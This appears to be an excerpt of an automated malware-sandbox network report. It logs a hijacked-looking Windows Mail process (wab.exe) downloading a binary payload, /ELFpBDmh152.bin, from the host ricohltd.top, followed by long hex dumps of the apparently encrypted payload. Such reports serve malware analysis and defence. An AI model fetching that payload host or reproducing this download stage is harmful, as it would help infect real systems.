                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 87d11c1bb8c18029-IAD
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-01 16:22:20 UTC528INData Raw: 41 72 91 d5 46 b0 aa d4 92 e6 3b ac b2 fa b1 d5 61 b6 e9 00 60 78 08 4f 4a 8f 3d 46 27 86 fe 9e 18 4d 44 02 3c 05 fa f3 0c cf f2 72 31 c3 b2 50 07 c0 a5 d6 ac 76 3d 61 bb 8b 48 fb 36 8e 2c a8 37 27 6e ff f7 c8 58 11 f7 e3 09 a3 ee 5b 55 8f 31 12 df 12 05 27 01 0f 54 79 04 7b 00 32 99 f2 71 3c c1 ab f6 5e bf 29 ce b0 0f c8 15 e9 0b a7 cb 8a 14 05 13 a8 ce 07 fa ed ce e1 27 c6 50 65 2a 25 88 6b dd 9e 98 ef c4 b5 99 d3 11 02 ed 6c d1 3d d5 54 e3 a9 4b 42 65 c7 86 92 19 52 1d cb 3a f8 92 dc 45 fc e7 ed 33 14 d7 08 37 4d 7c c4 79 aa db 63 36 12 95 eb 21 b8 d7 48 cf 07 36 2b 6b 29 24 54 03 6b 9e 5c 3c d3 c5 0c 57 45 cb b6 e7 bd a8 cf 08 35 33 07 e8 80 e3 62 a7 99 13 1f 1c 9d ac cf 4e 96 5b c2 88 f0 69 46 b6 13 c2 39 f0 d0 f2 16 f3 71 87 ef df 94 e0 3e f8 a1 cd
                                              Data Ascii: ArF;a`xOJ=F'MD<r1Pv=aH6,7'nX[U1'Ty{2q<^)'Pe*%kl=TKBeR:E37M|yc6!H6+k)$Tk\<WE53bN[iF9q>
                                              2024-05-01 16:22:20 UTC1369INData Raw: 1c 1d 1b fa 42 83 b2 d5 1c 67 ea ae 84 27 8f ad ba f4 6f 73 21 7e b4 d0 cd 51 e4 fe bb 36 a3 f3 fe 62 d6 2a 3c 50 4a 95 61 59 a3 0c a0 be ee 56 dc 94 fe 34 11 9e d6 5d 50 1f 22 41 14 b9 08 17 29 d0 7b 8a 01 de 78 86 c9 08 80 1c 8b 14 1b 3e 1d b2 38 17 78 2b 31 26 0e a2 1b f6 98 b4 18 49 e5 6a 16 82 3e 3f 15 82 53 c9 6d 93 ed 71 d5 71 85 7a 98 9d 87 85 d4 37 8d 40 1f 39 41 81 93 77 a3 cf e8 9a e0 99 37 3f 5a b3 ca 47 10 67 87 7a ea 63 59 a3 6a 96 78 72 83 35 3d 86 94 95 c5 1b 9b 7d 84 4b 59 7a c3 67 4f 0c d8 d4 95 68 1a 97 6a 26 08 eb fc 97 ca e7 cb 2a 50 af ba 75 0b 3c 5e 06 0f 50 7a bf 8d ec 58 ea 1a 99 65 37 3d 10 0e 09 13 bc 5a 39 02 e2 d9 dd e4 2c da f6 10 5c 25 bb d9 d4 68 79 4c 4b 48 83 11 ae ee 2b 0f 5c d9 e3 78 0a 9d 2a 31 bf 3b b1 bc 00 3e d7 fb
                                              Data Ascii: Bg'os!~Q6b*<PJaYV4]P"A){x>8x+1&Ij>?Smqqz7@9Aw7?ZGgzcYjxr5=}KYzgOhj&*Pu<^PzXe7=Z9,\%hyLKH+\x*1;>
                                              2024-05-01 16:22:20 UTC1369INData Raw: f4 c8 30 88 73 a6 09 4b 2a 90 56 8f d0 d1 66 f2 51 60 01 e7 8a 74 04 7b 68 91 19 b7 71 d4 e4 9f f5 5e e6 ea 77 c8 5a 8f 15 01 83 aa cb 8a 7c a8 93 ed ce ef f5 d9 cd e1 76 04 3a 65 9d c2 66 22 dd c2 19 11 e5 0d f0 28 5c 66 b9 ec 4f 7d f6 24 c8 05 46 30 bd 32 f3 b6 78 d4 03 97 4e d8 98 78 e5 cb 92 6b cc 4e ba 28 2a c1 96 fc 42 82 bf ee 5a 12 98 e1 6d 73 57 0d cf ef ff 18 0c b2 c6 ba ca fe 70 23 1c 43 10 cb 47 e9 59 c8 9b e6 bf b1 3b a7 33 f9 39 e6 2d b0 13 60 c6 38 4b 91 8b 08 20 34 c9 bc 49 57 0b 38 97 81 c8 c7 0b 8a 08 fc e2 88 52 c8 91 89 d6 17 85 5b f0 14 7f b9 f9 3f 25 35 50 dd 55 2b bc c6 ea 06 4d 54 f0 94 d7 b5 54 d3 2d e8 26 0c ff c6 72 05 bd a5 2a 55 c6 7a 29 23 82 f9 13 e4 1f 01 bd 6c c9 c7 d8 c6 c2 32 21 15 64 16 47 9b b9 ff d3 98 5d 39 dd ef 97
                                              Data Ascii: 0sK*VfQ`t{hq^wZ|v:ef"(\fO}$F02xNxkN(*BZmsWp#CGY;39-`8K 4IW8R[?%5PU+MTT-&r*Uz)#l2!dG]9
                                              2024-05-01 16:22:20 UTC1369INData Raw: ec 10 21 48 50 e9 48 80 ca 10 01 4d 19 74 3e 02 a4 e0 ef fe f0 de 70 dd 31 cd da 12 e8 f9 d2 2d 82 89 9e 7f a3 99 5d 5e 03 90 a8 db 01 69 f5 bc 8d 26 5d 11 dd 06 f1 84 7c ac 98 78 ab 7b a8 7a 7b be 3a cf 7b 35 61 d4 29 28 8b b2 24 69 8f e7 3f 39 9c 62 b0 45 1e a7 a6 0c 9a 3a ae 9c 72 f6 de 82 9b 8c d4 bb 65 28 ee b9 ee a7 a7 20 00 83 70 36 18 9d d9 80 df 70 64 1f 2c 1c 37 a5 71 b8 46 9c f5 2f 32 13 1a ab 5c 3f 79 32 ac 45 fc 85 fc ab 73 f8 26 67 8c 8c d3 bf 0a 70 a6 cd f9 07 4f cc c7 e7 27 ef ff bc c9 cc 6b 2c 1f 21 b8 b2 99 2a e1 4d 4c 63 c6 ce 6f a6 f1 56 d3 64 b8 47 a9 21 49 b5 e8 67 ff 33 3b 08 dd 29 88 13 01 6d c9 21 21 fd 22 4d 7b 6b 8d 68 46 9e 74 9e e7 52 0b b4 5f 91 ac 58 6f b3 29 7c 01 4c 9b 9c 0e df 20 09 50 19 46 03 e6 e2 9a b1 4f c8 fd c6 8a
                                              Data Ascii: !HPHMt>p1-]^i&]|x{z{:{5a)($i?9bE:re( p6pd,7qF/2\?y2Es&gpO'k,!*MLcoVdG!Ig3;)m!!"M{khFtR_Xo)|L PFO
                                              2024-05-01 16:22:20 UTC1369INData Raw: 34 8a aa 4e 28 fa 36 a3 ac ed f6 3d 89 5a dd a5 e4 9e 93 e7 ea a8 08 91 63 c7 8b df b2 8d e7 69 3d 11 ad 84 1a fd 89 97 ce af 7d 10 27 19 31 c1 f2 d6 50 52 b4 42 98 7e a7 20 05 fa 61 72 cf 5a 54 8f 9c a8 bf bf 5c 8f eb f8 72 b1 cc c6 03 04 a6 64 9d b0 db ca 3f c7 e5 58 a2 16 9a 74 fb 86 d3 d6 1a 37 36 32 4e cd 5d 5a 64 d2 48 77 2f 3b 01 51 2c ff 00 a8 b6 bd e6 e1 fa 47 bb a9 69 9a a0 02 91 4c b2 85 8f 65 44 5f 49 f8 9a 26 36 c6 52 c3 f1 e3 fc 5d aa d4 5d f0 ca ff 06 88 6a a9 86 7a ad 46 87 6b e5 df 40 ce 28 cb 3f c8 0b bc 45 59 8b 3e 20 eb ea e4 b1 93 f6 e3 74 d5 0e 5c 1a 43 4a 49 37 a0 ee 84 68 d1 96 f6 bc 8a 61 a3 9e 22 f1 2a bc 3e 7f ce d1 ed b4 36 39 be 3e 0f 57 ca be ea 23 a7 50 24 2a 09 37 4d 2c e8 68 e6 4a b9 49 55 20 bc 57 aa 38 14 53 65 4e aa 61
                                              Data Ascii: 4N(6=Zci=}'1PRB~ arZT\rd?Xt762N]ZdHw/;Q,GiLeD_I&6R]]jzFk@(?EY> t\CJI7ha"*>69>W#P$*7M,hJIU W8SeNa
                                              2024-05-01 16:22:20 UTC1369INData Raw: 00 ea 21 cd ec e5 e8 14 d4 ea d2 bd 45 d2 12 46 87 b2 d5 97 8f 61 61 07 5a 8f a5 c9 47 82 94 23 85 4b 5b c5 10 b5 75 74 de 46 0e 01 9d 86 a1 f7 b8 97 68 9e a6 f3 e4 f7 4c 11 a9 71 24 97 a7 4d 76 1b a0 da 91 ac b1 9f 62 5e ff ea 5f 81 75 51 32 72 8b c9 08 d9 4c 00 df f3 bf e3 4d c7 9c 90 c3 5e 4b 20 d0 fc b1 ec 5e d7 a1 c9 ed e8 7d b5 64 9b 72 bb 22 92 6c 12 8c c6 fa 4e f3 88 75 53 86 d4 37 06 15 1f b2 ce eb 93 5d 8d 22 99 06 0a 67 c8 c0 41 b0 97 1c d2 73 80 fa 96 49 5d a3 3c ed 8f 06 d1 66 d5 2b 97 95 c5 90 43 fe bf 5b 6b 3e 96 2c af 90 ed 5a 6a 97 99 eb 47 32 08 60 14 6c 88 e7 42 6c 74 bf cc 9e f2 48 7a 12 5f b8 f6 b3 8d ec 01 ba 4f 71 26 c5 c2 2f a3 aa 79 5e 3d c1 cc a2 b9 20 90 08 ce 9e e5 a1 da 40 52 1c 80 06 48 4b 48 de 4a 25 20 c3 55 5f d9 e3 87 7e
                                              Data Ascii: !EFaaZG#K[utFhLq$Mvb^_uQ2rLM^K ^}dr"lNuS7]"gAsI]<f+C[k>,ZjG2`lBltHz_Oq&/y^= @RHKHJ% U_~
                                              2024-05-01 16:22:20 UTC1369INData Raw: ef 53 49 63 4f f8 17 5e 75 8c fb aa 0a 5c 11 78 2d e1 a3 15 a4 55 43 e1 5e 81 54 05 cf dc 26 17 79 c8 f8 7c 16 9d f2 22 b7 18 df df b6 37 d0 31 4f 36 8c 31 e1 79 b9 9d 01 df ed 69 51 31 f8 71 26 45 11 c7 af a9 9a db 39 02 5e a9 0e 9d 7c 93 09 28 9e 37 21 8b c4 e3 8c f1 24 c7 91 a7 c9 ec 56 a2 f1 78 b7 07 80 42 53 3f 82 a3 fc ca 6b 98 83 46 d7 4a 32 5c f7 9f 0a 57 34 e1 e0 67 6a ca 47 e7 1e 27 9e 35 2b 0f 59 ad f9 5f b5 5b 22 68 36 93 8c 67 cc 04 43 bc 33 9f 48 c4 30 6d b6 f7 e6 fe ec 2f 21 00 31 e2 fa 63 22 8a 93 71 57 ad f7 ce 4d 9d bf 9c 88 a6 9a e0 68 d1 0e a4 ce 5d a5 f6 1f 00 53 18 be 40 47 06 a8 00 e0 9e 31 ec 03 67 75 12 a0 71 66 1d cb 1d f8 43 ae d5 21 e0 21 f3 46 be 75 45 25 05 a8 39 dc e9 8d e2 d9 84 08 88 be 2c 73 97 b3 28 eb 92 73 21 10 10 ef
                                              Data Ascii: SIcO^u\x-UC^T&y|"71O61yiQ1q&E9^|(7!$VxBS?kFJ2\W4gjG'5+Y_["h6gC3H0m/!1c"qWMh]S@G1guqfC!!FuE%9,s(s!
                                              2024-05-01 16:22:20 UTC1369INData Raw: c3 4c 3c 3a 80 85 b4 cb bc 3c 6a 04 5e 83 84 74 35 3f 38 ec 57 01 76 ab a2 7c 39 66 13 88 bf 2f f3 fd 56 a6 7c 5f 53 e9 06 25 34 5e 1d ad 5b 50 28 b1 ac af e4 e4 f7 48 85 fd bc 8f 17 dd 20 f9 e2 ba de 5b a0 29 aa ab 60 7d fa bf eb 75 8b 5f cc 97 c6 21 28 da d1 7f 65 a2 59 65 fb 98 6d dd 18 1f a7 a6 15 f1 ca af 93 f7 d9 1d 86 9b e5 c2 3f 4f 6f 56 12 31 03 26 2c 63 fe 61 32 f1 e1 26 95 db 68 6d 3b d7 c0 cf ce 36 b8 95 c5 d2 6a cd 8f 67 a2 b4 df ce 73 b3 88 7f 89 b3 23 57 46 27 0d 8d 25 cd bb f9 ed 7f c2 95 ff cc 08 9b 73 49 fd 2f eb 1c 74 14 62 10 cd 97 71 ca 7f 5f b8 91 e8 2f c9 b2 d7 81 8d 61 9b ca 40 46 12 b9 5d 2b 7a e5 d9 b0 74 a0 b6 73 6e 06 86 bd 97 d4 02 35 30 a8 1d a5 ba 02 a6 8c e7 3c 2d 80 7b d4 89 e2 ef 9a 4c 8f 7c 1a ea 27 50 f3 c2 f4 e3 6b e9
                                              Data Ascii: L<:<j^t5?8Wv|9f/V|_S%4^[P(H [)`}u_!(eYem?OoV1&,ca2&hm;6jgs#WF'%sI/tbq_/a@F]+ztsn50<-{L|'Pk
                                              2024-05-01 16:22:20 UTC1369INData Raw: 86 87 cf 43 bf d8 a3 8b 11 c5 06 ef f2 cf f5 21 12 7a 2e e0 c9 b6 5e 5e b3 05 a6 5a 16 32 66 b4 a8 25 47 77 3f ff 49 b2 18 8d b6 1f ca 88 15 d8 67 8d 68 db 29 e1 55 ce 95 a1 73 4a 5d fc ef b1 c9 91 2f 8f 8c 19 10 e4 76 6e 15 7f 43 d0 da 44 a1 9d 74 54 3a d5 3d 0f 6f fc c8 99 2e 8b 9f 9c ca 17 52 44 53 86 b1 29 5f 7e 82 70 a3 c0 8f c9 32 0d f2 42 63 40 ac e3 d0 87 e6 2f 88 94 00 74 73 62 e9 d7 c2 88 7f bb a1 69 6c 4e fd 6e 39 c1 eb 1c 76 af 08 49 8c 1f ea a7 3a 26 e7 66 5f 5f 50 91 16 c2 10 41 31 ee 11 e3 f5 a2 01 32 0d 31 fd 19 ab 7e f3 58 ef cf 8f c7 ef ad 51 97 10 dd 60 24 d7 ae 06 86 0d 63 a6 de 35 3e 32 92 d2 e9 6d af 6c 21 58 50 b1 37 d1 84 98 39 ea fe ac 51 d6 89 cc fa a9 14 e2 66 5f 34 2e 8f ea d4 8a 9e 64 81 ad e4 e1 4e a8 3b 7e f2 aa 6e f8 c1 50
                                              Data Ascii: C!z.^^Z2f%Gw?Igh)UsJ]/vnCDtT:=o.RDS)_~p2Bc@/tsbilNn9vI:&f__PA121~XQ`$c5>2ml!XP79Qf_4.dN;~nP
                                              2024-05-01 16:22:20 UTC1369INData Raw: 05 45 71 30 bc 32 38 10 88 42 e3 fb 15 f6 58 ce de e8 2c d4 e2 d2 aa 31 2d 12 92 6a 4d 2a 4c ec 24 46 0c ce 70 52 b9 a3 3a 9b bd a7 4b 2f 4e 95 e8 a9 80 42 87 ef 8b 43 5d e4 d4 3f a3 6a 9e d4 af 37 25 65 e1 13 2b 6b 55 4f a6 ce 3e 00 cc 91 d8 11 fc 9e d5 e8 d6 49 67 01 4d fe 64 6e 85 e1 7f e3 88 d7 90 f0 4d 5a 7a fe a7 d4 61 ae 28 0d 80 68 6f 11 14 c2 9d 46 ff c6 ce 50 ef df 0c 38 aa cd b6 c5 c0 71 0e b4 70 e2 68 7a 2b fb 06 41 dc 6c 8a 6d 10 4a 81 aa fc f7 0c dc 27 6f f6 01 22 b8 ef fc cd 72 67 69 11 f3 82 ce a2 8d 7c 6c 64 6d 8e 6a b0 0b 64 08 88 a3 cd 92 3c 58 ea 35 bc 2a 91 20 4a 7f 1b fa f7 14 7f 23 c1 ba 09 24 50 fe eb d8 86 60 7a 16 5a 06 2d ec 06 15 b0 e7 f5 66 da bc 49 f4 08 e5 39 f1 1a 1c ea 1d 07 20 1b d3 ae 52 37 d7 ea ec 31 fa 98 86 b4 b4 3c
                                              Data Ascii: Eq028BX,1-jM*L$FpR:K/NBC]?j7%e+kUO>IgMdnMZza(hoFP8qphz+AlmJ'o"rgi|ldmjd<X5* J#$P`zZ-fI9 R71<


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.2249205104.21.60.384432028C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-01 16:22:29 UTC172OUTGET /ELFpBDmh152.bin HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                              Host: ricohltd.top
                                              Cache-Control: no-cache
                                              2024-05-01 16:22:29 UTC847INHTTP/1.1 200 OK
                                              Date: Wed, 01 May 2024 16:22:29 GMT
                                              Content-Type: application/octet-stream
                                              Content-Length: 494656
                                              Connection: close
                                              Last-Modified: Mon, 22 Apr 2024 16:13:43 GMT
                                              ETag: "66268cb7-78c40"
                                              Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                              Cache-Control: max-age=315360000
                                              CF-Cache-Status: HIT
                                              Age: 35258
                                              Accept-Ranges: bytes
                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BN29vtvAmJXRcrqIuA3eX6wZOLmT90jn2oyyizkIm2r%2BDHC2sgN0ulEcRHjroVk2Ew7YqN%2BCgoyWxuxlWU7dDjya5nY32j%2FSTy%2F6WrpHzZljPJcUCNAOigCqB%2FfyA%2FY%3D"}],"group":"cf-nel","max_age":604800}
                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                              Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                              X-Content-Type-Options: nosniff
                                              Server: cloudflare
                                              CF-RAY: 87d11c51cee95722-IAD
                                              alt-svc: h3=":443"; ma=86400
                                              2024-05-01 16:22:29 UTC522INData Raw: 41 72 91 d5 46 b0 aa d4 92 e6 3b ac b2 fa b1 d5 61 b6 e9 00 60 78 08 4f 4a 8f 3d 46 27 86 fe 9e 18 4d 44 02 3c 05 fa f3 0c cf f2 72 31 c3 b2 50 07 c0 a5 d6 ac 76 3d 61 bb 8b 48 fb 36 8e 2c a8 37 27 6e ff f7 c8 58 11 f7 e3 09 a3 ee 5b 55 8f 31 12 df 12 05 27 01 0f 54 79 04 7b 00 32 99 f2 71 3c c1 ab f6 5e bf 29 ce b0 0f c8 15 e9 0b a7 cb 8a 14 05 13 a8 ce 07 fa ed ce e1 27 c6 50 65 2a 25 88 6b dd 9e 98 ef c4 b5 99 d3 11 02 ed 6c d1 3d d5 54 e3 a9 4b 42 65 c7 86 92 19 52 1d cb 3a f8 92 dc 45 fc e7 ed 33 14 d7 08 37 4d 7c c4 79 aa db 63 36 12 95 eb 21 b8 d7 48 cf 07 36 2b 6b 29 24 54 03 6b 9e 5c 3c d3 c5 0c 57 45 cb b6 e7 bd a8 cf 08 35 33 07 e8 80 e3 62 a7 99 13 1f 1c 9d ac cf 4e 96 5b c2 88 f0 69 46 b6 13 c2 39 f0 d0 f2 16 f3 71 87 ef df 94 e0 3e f8 a1 cd
                                              Data Ascii: ArF;a`xOJ=F'MD<r1Pv=aH6,7'nX[U1'Ty{2q<^)'Pe*%kl=TKBeR:E37M|yc6!H6+k)$Tk\<WE53bN[iF9q>
                                              2024-05-01 16:22:29 UTC1369INData Raw: b4 63 70 f0 fe 59 1c 1d 1b fa 42 83 b2 d5 1c 67 ea ae 84 27 8f ad ba f4 6f 73 21 7e b4 d0 cd 51 e4 fe bb 36 a3 f3 fe 62 d6 2a 3c 50 4a 95 61 59 a3 0c a0 be ee 56 dc 94 fe 34 11 9e d6 5d 50 1f 22 41 14 b9 08 17 29 d0 7b 8a 01 de 78 86 c9 08 80 1c 8b 14 1b 3e 1d b2 38 17 78 2b 31 26 0e a2 1b f6 98 b4 18 49 e5 6a 16 82 3e 3f 15 82 53 c9 6d 93 ed 71 d5 71 85 7a 98 9d 87 85 d4 37 8d 40 1f 39 41 81 93 77 a3 cf e8 9a e0 99 37 3f 5a b3 ca 47 10 67 87 7a ea 63 59 a3 6a 96 78 72 83 35 3d 86 94 95 c5 1b 9b 7d 84 4b 59 7a c3 67 4f 0c d8 d4 95 68 1a 97 6a 26 08 eb fc 97 ca e7 cb 2a 50 af ba 75 0b 3c 5e 06 0f 50 7a bf 8d ec 58 ea 1a 99 65 37 3d 10 0e 09 13 bc 5a 39 02 e2 d9 dd e4 2c da f6 10 5c 25 bb d9 d4 68 79 4c 4b 48 83 11 ae ee 2b 0f 5c d9 e3 78 0a 9d 2a 31 bf 3b
                                              Data Ascii: cpYBg'os!~Q6b*<PJaYV4]P"A){x>8x+1&Ij>?Smqqz7@9Aw7?ZGgzcYjxr5=}KYzgOhj&*Pu<^PzXe7=Z9,\%hyLKH+\x*1;
                                              2024-05-01 16:22:29 UTC1369INData Raw: 97 14 7a 95 a5 f3 f4 c8 30 88 73 a6 09 4b 2a 90 56 8f d0 d1 66 f2 51 60 01 e7 8a 74 04 7b 68 91 19 b7 71 d4 e4 9f f5 5e e6 ea 77 c8 5a 8f 15 01 83 aa cb 8a 7c a8 93 ed ce ef f5 d9 cd e1 76 04 3a 65 9d c2 66 22 dd c2 19 11 e5 0d f0 28 5c 66 b9 ec 4f 7d f6 24 c8 05 46 30 bd 32 f3 b6 78 d4 03 97 4e d8 98 78 e5 cb 92 6b cc 4e ba 28 2a c1 96 fc 42 82 bf ee 5a 12 98 e1 6d 73 57 0d cf ef ff 18 0c b2 c6 ba ca fe 70 23 1c 43 10 cb 47 e9 59 c8 9b e6 bf b1 3b a7 33 f9 39 e6 2d b0 13 60 c6 38 4b 91 8b 08 20 34 c9 bc 49 57 0b 38 97 81 c8 c7 0b 8a 08 fc e2 88 52 c8 91 89 d6 17 85 5b f0 14 7f b9 f9 3f 25 35 50 dd 55 2b bc c6 ea 06 4d 54 f0 94 d7 b5 54 d3 2d e8 26 0c ff c6 72 05 bd a5 2a 55 c6 7a 29 23 82 f9 13 e4 1f 01 bd 6c c9 c7 d8 c6 c2 32 21 15 64 16 47 9b b9 ff d3
                                              Data Ascii: z0sK*VfQ`t{hq^wZ|v:ef"(\fO}$F02xNxkN(*BZmsWp#CGY;39-`8K 4IW8R[?%5PU+MTT-&r*Uz)#l2!dG
                                              2024-05-01 16:22:29 UTC1369INData Raw: 0e 70 3b 93 63 09 ec 10 21 48 50 e9 48 80 ca 10 01 4d 19 74 3e 02 a4 e0 ef fe f0 de 70 dd 31 cd da 12 e8 f9 d2 2d 82 89 9e 7f a3 99 5d 5e 03 90 a8 db 01 69 f5 bc 8d 26 5d 11 dd 06 f1 84 7c ac 98 78 ab 7b a8 7a 7b be 3a cf 7b 35 61 d4 29 28 8b b2 24 69 8f e7 3f 39 9c 62 b0 45 1e a7 a6 0c 9a 3a ae 9c 72 f6 de 82 9b 8c d4 bb 65 28 ee b9 ee a7 a7 20 00 83 70 36 18 9d d9 80 df 70 64 1f 2c 1c 37 a5 71 b8 46 9c f5 2f 32 13 1a ab 5c 3f 79 32 ac 45 fc 85 fc ab 73 f8 26 67 8c 8c d3 bf 0a 70 a6 cd f9 07 4f cc c7 e7 27 ef ff bc c9 cc 6b 2c 1f 21 b8 b2 99 2a e1 4d 4c 63 c6 ce 6f a6 f1 56 d3 64 b8 47 a9 21 49 b5 e8 67 ff 33 3b 08 dd 29 88 13 01 6d c9 21 21 fd 22 4d 7b 6b 8d 68 46 9e 74 9e e7 52 0b b4 5f 91 ac 58 6f b3 29 7c 01 4c 9b 9c 0e df 20 09 50 19 46 03 e6 e2 9a
                                              Data Ascii: p;c!HPHMt>p1-]^i&]|x{z{:{5a)($i?9bE:re( p6pd,7qF/2\?y2Es&gpO'k,!*MLcoVdG!Ig3;)m!!"M{khFtR_Xo)|L PF
                                              2024-05-01 16:22:29 UTC1369INData Raw: 26 f2 63 60 b9 b5 34 8a aa 4e 28 fa 36 a3 ac ed f6 3d 89 5a dd a5 e4 9e 93 e7 ea a8 08 91 63 c7 8b df b2 8d e7 69 3d 11 ad 84 1a fd 89 97 ce af 7d 10 27 19 31 c1 f2 d6 50 52 b4 42 98 7e a7 20 05 fa 61 72 cf 5a 54 8f 9c a8 bf bf 5c 8f eb f8 72 b1 cc c6 03 04 a6 64 9d b0 db ca 3f c7 e5 58 a2 16 9a 74 fb 86 d3 d6 1a 37 36 32 4e cd 5d 5a 64 d2 48 77 2f 3b 01 51 2c ff 00 a8 b6 bd e6 e1 fa 47 bb a9 69 9a a0 02 91 4c b2 85 8f 65 44 5f 49 f8 9a 26 36 c6 52 c3 f1 e3 fc 5d aa d4 5d f0 ca ff 06 88 6a a9 86 7a ad 46 87 6b e5 df 40 ce 28 cb 3f c8 0b bc 45 59 8b 3e 20 eb ea e4 b1 93 f6 e3 74 d5 0e 5c 1a 43 4a 49 37 a0 ee 84 68 d1 96 f6 bc 8a 61 a3 9e 22 f1 2a bc 3e 7f ce d1 ed b4 36 39 be 3e 0f 57 ca be ea 23 a7 50 24 2a 09 37 4d 2c e8 68 e6 4a b9 49 55 20 bc 57 aa 38
                                              Data Ascii: &c`4N(6=Zci=}'1PRB~ arZT\rd?Xt762N]ZdHw/;Q,GiLeD_I&6R]]jzFk@(?EY> t\CJI7ha"*>69>W#P$*7M,hJIU W8
                                              2024-05-01 16:22:29 UTC1369INData Raw: ec f7 fa 68 5f d1 00 ea 21 cd ec e5 e8 14 d4 ea d2 bd 45 d2 12 46 87 b2 d5 97 8f 61 61 07 5a 8f a5 c9 47 82 94 23 85 4b 5b c5 10 b5 75 74 de 46 0e 01 9d 86 a1 f7 b8 97 68 9e a6 f3 e4 f7 4c 11 a9 71 24 97 a7 4d 76 1b a0 da 91 ac b1 9f 62 5e ff ea 5f 81 75 51 32 72 8b c9 08 d9 4c 00 df f3 bf e3 4d c7 9c 90 c3 5e 4b 20 d0 fc b1 ec 5e d7 a1 c9 ed e8 7d b5 64 9b 72 bb 22 92 6c 12 8c c6 fa 4e f3 88 75 53 86 d4 37 06 15 1f b2 ce eb 93 5d 8d 22 99 06 0a 67 c8 c0 41 b0 97 1c d2 73 80 fa 96 49 5d a3 3c ed 8f 06 d1 66 d5 2b 97 95 c5 90 43 fe bf 5b 6b 3e 96 2c af 90 ed 5a 6a 97 99 eb 47 32 08 60 14 6c 88 e7 42 6c 74 bf cc 9e f2 48 7a 12 5f b8 f6 b3 8d ec 01 ba 4f 71 26 c5 c2 2f a3 aa 79 5e 3d c1 cc a2 b9 20 90 08 ce 9e e5 a1 da 40 52 1c 80 06 48 4b 48 de 4a 25 20 c3
                                              Data Ascii: h_!EFaaZG#K[utFhLq$Mvb^_uQ2rLM^K ^}dr"lNuS7]"gAsI]<f+C[k>,ZjG2`lBltHz_Oq&/y^= @RHKHJ%
                                              2024-05-01 16:22:29 UTC1369INData Raw: e5 8e 7a 36 d9 f0 ef 53 49 63 4f f8 17 5e 75 8c fb aa 0a 5c 11 78 2d e1 a3 15 a4 55 43 e1 5e 81 54 05 cf dc 26 17 79 c8 f8 7c 16 9d f2 22 b7 18 df df b6 37 d0 31 4f 36 8c 31 e1 79 b9 9d 01 df ed 69 51 31 f8 71 26 45 11 c7 af a9 9a db 39 02 5e a9 0e 9d 7c 93 09 28 9e 37 21 8b c4 e3 8c f1 24 c7 91 a7 c9 ec 56 a2 f1 78 b7 07 80 42 53 3f 82 a3 fc ca 6b 98 83 46 d7 4a 32 5c f7 9f 0a 57 34 e1 e0 67 6a ca 47 e7 1e 27 9e 35 2b 0f 59 ad f9 5f b5 5b 22 68 36 93 8c 67 cc 04 43 bc 33 9f 48 c4 30 6d b6 f7 e6 fe ec 2f 21 00 31 e2 fa 63 22 8a 93 71 57 ad f7 ce 4d 9d bf 9c 88 a6 9a e0 68 d1 0e a4 ce 5d a5 f6 1f 00 53 18 be 40 47 06 a8 00 e0 9e 31 ec 03 67 75 12 a0 71 66 1d cb 1d f8 43 ae d5 21 e0 21 f3 46 be 75 45 25 05 a8 39 dc e9 8d e2 d9 84 08 88 be 2c 73 97 b3 28 eb
                                              Data Ascii: z6SIcO^u\x-UC^T&y|"71O61yiQ1q&E9^|(7!$VxBS?kFJ2\W4gjG'5+Y_["h6gC3H0m/!1c"qWMh]S@G1guqfC!!FuE%9,s(
                                              2024-05-01 16:22:29 UTC1369INData Raw: 68 fc a7 63 8c 43 c3 4c 3c 3a 80 85 b4 cb bc 3c 6a 04 5e 83 84 74 35 3f 38 ec 57 01 76 ab a2 7c 39 66 13 88 bf 2f f3 fd 56 a6 7c 5f 53 e9 06 25 34 5e 1d ad 5b 50 28 b1 ac af e4 e4 f7 48 85 fd bc 8f 17 dd 20 f9 e2 ba de 5b a0 29 aa ab 60 7d fa bf eb 75 8b 5f cc 97 c6 21 28 da d1 7f 65 a2 59 65 fb 98 6d dd 18 1f a7 a6 15 f1 ca af 93 f7 d9 1d 86 9b e5 c2 3f 4f 6f 56 12 31 03 26 2c 63 fe 61 32 f1 e1 26 95 db 68 6d 3b d7 c0 cf ce 36 b8 95 c5 d2 6a cd 8f 67 a2 b4 df ce 73 b3 88 7f 89 b3 23 57 46 27 0d 8d 25 cd bb f9 ed 7f c2 95 ff cc 08 9b 73 49 fd 2f eb 1c 74 14 62 10 cd 97 71 ca 7f 5f b8 91 e8 2f c9 b2 d7 81 8d 61 9b ca 40 46 12 b9 5d 2b 7a e5 d9 b0 74 a0 b6 73 6e 06 86 bd 97 d4 02 35 30 a8 1d a5 ba 02 a6 8c e7 3c 2d 80 7b d4 89 e2 ef 9a 4c 8f 7c 1a ea 27 50
                                              Data Ascii: hcCL<:<j^t5?8Wv|9f/V|_S%4^[P(H [)`}u_!(eYem?OoV1&,ca2&hm;6jgs#WF'%sI/tbq_/a@F]+ztsn50<-{L|'P
